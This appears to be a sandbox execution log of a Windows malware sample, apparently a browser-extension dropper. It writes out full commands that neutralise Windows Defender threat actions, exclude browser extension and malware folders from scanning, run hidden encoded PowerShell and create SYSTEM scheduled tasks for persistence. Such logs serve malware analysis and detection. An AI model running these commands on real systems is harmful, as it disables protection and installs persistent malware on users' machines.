C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bEcIFlOHxifjjBuFoU" /SC once /ST 17:02:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\mONaQiMaftsWsACiF\XGCbIkdqGYWeuOB\vAelVis.exe\" 1V /LPsite_idWmK 385118 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:3952
-
-
-
C:\Users\Admin\AppData\Local\Temp\mONaQiMaftsWsACiF\XGCbIkdqGYWeuOB\vAelVis.exeC:\Users\Admin\AppData\Local\Temp\mONaQiMaftsWsACiF\XGCbIkdqGYWeuOB\vAelVis.exe 1V /LPsite_idWmK 385118 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
PID:4456 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3052 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
- Suspicious use of WriteProcessMemory
PID:2512 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:4696
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:3712
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:4768
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:3204
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:2168
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:1612
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:3528
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:2024
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:4168
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:2476
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:1212
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:4452
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:1372
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:2144
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:5008
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:2456
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:4296
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:4544
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:3976
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:2028
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:32
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:2500
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:3612
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:3668
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵PID:4516
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵PID:2316
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵PID:4860
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵PID:4940
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\CxyVDACQkgMCyKCFbBR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\CxyVDACQkgMCyKCFbBR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\IgAQuzzvNCUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\IgAQuzzvNCUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YrliKKkuhgWU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YrliKKkuhgWU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\orRvbnhdU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\orRvbnhdU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ycfBUKIjHxeOC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ycfBUKIjHxeOC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\qgjSpVnHOWlNdqVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\qgjSpVnHOWlNdqVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\mONaQiMaftsWsACiF\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\mONaQiMaftsWsACiF\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\lwSRcZKonRlOofsg\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\lwSRcZKonRlOofsg\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4928 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CxyVDACQkgMCyKCFbBR" /t REG_DWORD /d 0 /reg:323⤵PID:1288
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CxyVDACQkgMCyKCFbBR" /t REG_DWORD /d 0 /reg:324⤵PID:4292
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CxyVDACQkgMCyKCFbBR" /t REG_DWORD /d 0 /reg:643⤵PID:2552
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IgAQuzzvNCUn" /t REG_DWORD /d 0 /reg:323⤵PID:2568
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IgAQuzzvNCUn" /t REG_DWORD /d 0 /reg:643⤵PID:4376
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YrliKKkuhgWU2" /t REG_DWORD /d 0 /reg:323⤵PID:3500
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YrliKKkuhgWU2" /t REG_DWORD /d 0 /reg:643⤵PID:5032
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\orRvbnhdU" /t REG_DWORD /d 0 /reg:323⤵PID:2496
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\orRvbnhdU" /t REG_DWORD /d 0 /reg:643⤵PID:1252
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ycfBUKIjHxeOC" /t REG_DWORD /d 0 /reg:323⤵PID:2644
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ycfBUKIjHxeOC" /t REG_DWORD /d 0 /reg:643⤵PID:2852
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\qgjSpVnHOWlNdqVB /t REG_DWORD /d 0 /reg:323⤵PID:1388
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\qgjSpVnHOWlNdqVB /t REG_DWORD /d 0 /reg:643⤵PID:2396
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:1764
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:1660
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:1912
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:3472
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\mONaQiMaftsWsACiF /t REG_DWORD /d 0 /reg:323⤵PID:2348
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\mONaQiMaftsWsACiF /t REG_DWORD /d 0 /reg:643⤵PID:3508
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\lwSRcZKonRlOofsg /t REG_DWORD /d 0 /reg:323⤵PID:5016
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\lwSRcZKonRlOofsg /t REG_DWORD /d 0 /reg:643⤵PID:1184
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gUFbOeYUT" /SC once /ST 10:54:16 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
PID:2796
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gUFbOeYUT"2⤵PID:2960
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gUFbOeYUT"2⤵PID:2028
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "aUYdFpynDtMaquqaO" /SC once /ST 13:57:33 /RU "SYSTEM" /TR "\"C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe\" F0 /Ggsite_idYxJ 385118 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1440
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "aUYdFpynDtMaquqaO"2⤵PID:5000
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:696 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:4244
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:3528
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:812
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1676
-
C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exeC:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe F0 /Ggsite_idYxJ 385118 /S1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:4628 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bEcIFlOHxifjjBuFoU"2⤵PID:3364
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &2⤵PID:2084
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"3⤵PID:4728
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True4⤵PID:1992
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2536 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True6⤵
- Suspicious use of AdjustPrivilegeToken
PID:4912
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\orRvbnhdU\cJnNzB.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "yozVwwMRZiDXbVH" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:3776
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "yozVwwMRZiDXbVH2" /F /xml "C:\Program Files (x86)\orRvbnhdU\BoIyvtW.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:1380
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "yozVwwMRZiDXbVH"2⤵PID:1696
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "yozVwwMRZiDXbVH"2⤵PID:4616
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "UQeOhhowVzyRxe" /F /xml "C:\Program Files (x86)\YrliKKkuhgWU2\vqoJCaF.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:1948
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "URgAKlFGIJbNQ2" /F /xml "C:\ProgramData\qgjSpVnHOWlNdqVB\UTmTfNY.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:4496
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "jnXffsNCSkeAQyNEq2" /F /xml "C:\Program Files (x86)\CxyVDACQkgMCyKCFbBR\dbotFoU.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:768
-
-
